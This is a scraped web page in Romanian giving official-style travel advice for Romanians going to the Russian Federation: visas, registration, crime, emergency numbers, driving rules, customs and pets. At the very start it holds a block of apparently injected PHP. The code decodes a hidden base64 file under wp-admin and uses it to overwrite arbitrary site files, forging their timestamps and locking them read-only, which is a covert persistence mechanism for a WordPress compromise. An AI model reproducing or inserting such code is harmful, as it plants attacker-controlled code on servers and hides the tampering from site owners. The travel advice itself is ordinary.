$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Federatia Rusa – O noua atitudine

Condiţii de intrare şi regim de şedere

Intrarea în Federaţia Rusă se face doar pe bază de viză.
Perioada maximă de şedere este de 90 zile în decurs de 6 luni (calculând zilele de la prima intrare).
Perioada de 90 zile poate însemna o şedere continuă sau se pot realiza mai multe intrări şi ieşiri, ce nu pot depăşi 90 zile.
Viza se obţine pe bază de invitaţie, care trebuie prezentată la ambasada sau consulatul Federaţiei Ruse.
Nu se poate obţine viza la frontieră.

Atenţie! În şapte zile de la intrarea în Federaţia Rusă este necesar ca viza să fie înregistrată la autorităţile locale de ordine publică de către persoana sau compania care a făcut invitaţia.
În cazul în care sunteţi turist, autorităţile locale vor fi anunţate de către unitatea de cazare.
În cazul în care viza rusă nu este înregistrată la organele competente (termenul de înregistrare este de maxim 7 zile), se plăteşte o amendă în valoare de până la 50 USD sau există riscul expulzării şi aplicării interdicţiei de intrare în Federaţia Rusă.

Documente necesare pentru călătoria în Federaţia Rusă:

Înainte de a intra în Federaţia Rusă recomandăm cetăţenilor români să verifice dacă deţin asupra lor următoarele documente:

  • paşaport valabil pentru încă şase luni de la data expirării vizei solicitate,
  • viza rusă valabilă,
  • copii după paşaport şi după viza rusă,
  • copia sau originalul invitaţiei/voucher/altă viză
  • formularul “migration card”.

La intrarea pe teritoriul Federaţiei Ruse, autorităţile ruse verifică paşaportul şi viza de intrare.
Ştampila de intrare va fi aplicată atât în paşaport, cât şi în formularul “migration card” (eventual şi în cardul de sosire/plecare).

După aplicarea ştampilei de intrare, ofiţerii de frontieră vor reţine partea superioară a formularului (detaşabilă).
Recomandăm să păstraţi formularul “migration card” pe întreaga perioadă de şedere în Federaţia Rusă. Prezentarea acestuia este necesară atât la înregistrarea vizei, cât şi la ieşirea din ţară.
Dacă doriţi să munciţi în Federaţia Rusă trebuie să obţineţi un permis de muncă de la autorităţile ruse competente.
În vederea obţinerii unei rezidenţe permanente, străinul trebuie să locuiască în Federaţia Rusă cel puţin un an în calitate de rezident temporar.

Pentru verificarea condiţiilor particulare de intrare prevăzute de legislaţia naţională rusă, recomandăm consultarea informaţiilor oficiale furnizate de autorităţile Federaţiei Ruse:

  • Ministerul Afacerilor Externe al Federaţiei Ruse (www.mid.ru)
  • Ambasada Federaţiei Ruse la Bucureşti
  • Consulatul General al Federaţiei Ruse la Constanţa

Intrarea şi şederea cetăţenilor români în Federaţia Rusă sunt reglementate prin Acordul privind regimul călătoriilor reciproce ale cetăţenilor, încheiat între România şi Federaţia Rusă la 1 iulie 2004 şi Acordul între Comunitatea Europeană şi Federaţia Rusă privind facilitarea eliberării vizelor.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Federaţia Rusă a fost, în ultimii ani, ţinta unor atentate şi luări de ostatici.
În acest context, recomandăm tuturor cetăţenilor români sa evite deplasările neesenţiale în Cecenia, Oseţia de Nord şi zonele adiacente: Daghestan, Inguşeţia, Stavropol Kray, Karachevo-Cherkessia şi Kabardino-Balkaria, unde securitatea personală este greu de asigurat din cauza stării de tensiune indusă de situaţia din Cecenia.

Nu uitaţi să vă informaţi în prealabil asupra situaţiei de securitate din zonă! Urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile ruse şi accesaţi periodic pagina web a Ministerului român al Afacerilor Externe (www.mae.ro).

Siguranţă şi criminalitate

Cele mai frecvente infracţiuni in Federaţia Rusă sunt furturile, înşelăciunile şi atacurile asupra persoanei. Recomandăm o atenţie sporită la păstrarea documentelor de călătorie şi a valorilor (sume de bani, documente referitoare la conturi bancare, depozite de valori, obiecte de valoare).

  • Este recomandabil să păstraţi documentele şi valorile personale, biletele de călătorie şi banii sau cărţile de credit în locuri sigure şi să nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul în care călătoriţi cu autobuze sau trenuri vă recomandăm să aveţi bagajele în atenţie pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, vă recomandăm ca documentele personale să le lăsaţi la hotel şi să păstraţi la dumneavoastră o copie a actelor de identitate (paşaport, permis de şedere).

Dacă sunteţi victima unor infracţiuni sau aţi pierdut documente de identitate, trebuie să informaţi de urgenţă autorităţile locale, în vederea obţinerii unor documente doveditoare, în baza cărora urmează să vă reglementaţi situaţia şederii pe teritoriul rus.
Cu aceste documente doveditoare vă deplasaţi la ambasada / consulatul României în Federaţia Rusă pentru a primi sprijin în vederea întoarcerii în ţară.

În cazul unor incidente în care vă este afectată siguranţa personală sau a bunurilor dumneavoastră, vă recomandăm contactarea celui mai apropiat birou al poliţiei.

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor ruse, trebuie apelate următoarele numere de urgenţă:

  • Pompierii 01
  • Miliţia 02
  • Salvarea 03

Vă recomandăm, de asemenea, sesizarea oficiului consular român cel mai apropiat, care poate acorda asistenţa consulară în condiţiile prevăzute de lege.

Sistemul medical

Pentru a putea călători în Federaţia Rusă este obligatorie încheierea unei asigurări medicale şi de călătorie valabile pe perioada prezenţei pe teritoriul rus.
Recomandăm tuturor cetăţenilor români care călătoresc în Federaţia Rusă să încheie poliţe de asigurare medicală de călătorie, care să acopere cheltuielile medicale pentru intervenţiile de urgenţă, tratament şi evacuare.

Condiţii privind traficul auto

  • Circulaţia auto:

Circulaţia rutieră se desfăşoară pe partea dreapta a drumului.
Toate autovehiculele care participă la traficul auto din Federaţia Rusă trebuie să fie dotate cu triunghiuri reflectorizante.
Vă recomandăm să vă dotaţi autovehiculele cu stingătoare auto, trusă cu piese de schimb de maximă utilitate (lămpi auto şi siguranţe) şi trusă de prim ajutor. În caz contrar, riscaţi să fiţi amendaţi!
Copiii sub 12 ani nu au voie sa stea pe scaunul din faţă al autovehiculului.
Conducerea sub influenta alcoolului este interzisă.

  • Centura de siguranţă:

Pentru toţi pasagerii este obligatorie purtarea centurii de siguranţă, inclusiv pentru pasagerii aflaţi pe bancheta din spate a autovehiculului.

  • Parcarea

Parcarea este permisă în locurile special amenajate şi pe partea dreaptă a străzilor (unde nu este prevăzută în mod expres o interdicţie în acest sens), în direcţia de deplasare a autovehiculului.
Nu este permisă parcarea pe marginea autostrăzilor naţionale.
Parcarea ilegală atrage imobilizarea autovehiculului, prin montarea unor dispozitive de blocare a roţilor, care se demontează contra cost.

  • Limitele de viteză:
    • în oraşe: 50 km/h;
    • în localităţi rurale: 60 km/h;
    • pe şoselele principale: până la 90 km/h
    • pe autostrăzi: 120 km/h

Atenţie la semnele de circulaţie care indică limita de viteză!

  • Utilizarea dispozitivelor radar şi antiradar:

Utilizarea pe teritoriului Federaţiei Ruse a detectoarelor radar care atenţionează conducătorul auto asupra existenţei radarelor politiei rutiere nu constituie infracţiune sau contravenţie.
Utilizarea dispozitivelor antiradar care bruiază undele radio emise de un aparat radar al politiei rutiere se pedepseşte cu aplicarea unei amenzi şi cu posibila confiscare a acestora.

  • Permisul de conducere

Permisul de conducere românesc poate fi folosit doar dacă este însoţit de o traducere oficială în limba rusă.
Dacă intenţionaţi să staţi în Federaţia Rusă mai mult de 6 luni trebuie să obţineţi un permis de conducere local.

  • Informaţii pentru cazurile de accidente

Dacă aveţi vehiculul avariat înainte de a intra în Federaţia Rusă trebuie informată poliţia.
Nu este permisă părăsirea teritoriului fără documente justificative în cazul autoturismelor avariate.
Vă recomandăm să nu mişcaţi din locul accidentului până la sosirea autorităţilor locale de poliţie.
Autorităţile locale de poliţie vor întocmi un raport necesar companiei de asigurări sau în cazul în care părţile implicate în accident nu sunt de acord cu privire la anumite aspecte legate de accident.
Dacă daunele pot fi soluţionate pe cale amiabilă, în afara tribunalului, părţile sunt libere să facă acest lucru.

Atenţie! Părăsirea locului unui accident soldat cu rănirea unor persoane constituie delict penal.
Accidentele pot fi raportate la numărul de telefon 02.

Reglementări vamale

Vă recomandăm să declaraţi la vamă, în momentul intrării, sumele care depăşesc 3000 USD.
Importul sistemelor de poziţionare globala (GPS) sau a altor sisteme sunt uneori supuse unor regulamente speciale. O autorizaţie specială trebuie obţinută în cazul importului unor sisteme GPS utilizate ca aparaturi periferice pentru creşterea capacităţii unor calculatoare sau antene.
Telefoanele celulare pot fi importate fără restricţii. Pentru telefoanele prin satelit este necesară o aprobare prealabilă de import din partea autorităţilor ruse.
Calculatoarele portabile pentru uzul personal pot fi importate fără restricţii.

Regimul medicamentelor

În Federaţia Rusă sunt reguli foarte stricte privind importul unor cantităţi mari de medicamente.
Informaţii suplimentare pot fi obţinute de la Ambasada Federaţiei Ruse la Bucureşti şi de la Serviciul Vamal Federal al Federaţiei Ruse (11/5 Novozavodskaya St., Moscow 121087; www.customs.ru).

Regimul animalelor de companie

În cazul in care doriţi să transportaţi în Federaţia Rusă animale, trebuie să ţineţi cont de următoarele:

  • cu o zi înainte de a pleca din România, trebuie obţinut un certificat sanitar-veterinar de la Inspectoratul Sanitar-Veterinar, în care să se precizeze că animalul are efectuate toate vaccinurile necesare călătoriei în străinătate;
  • în aeroport/gară există servicii sanitar-veterinare care reţin primul certificat şi eliberează un altul, valabil în Federaţia Rusă;
  • la întoarcerea în România, autorităţile ruse vor elibera un certificat sanitar-veterinar, valabil trei zile.

În cazul în care se doreşte ca animalul să călătorească în avion alături de stăpân, trebuie făcută o rezervare specială anterioară zilei plecării (fără aceasta animalul va călători doar în cală).

Sursa: www.mae.ro

By o9admin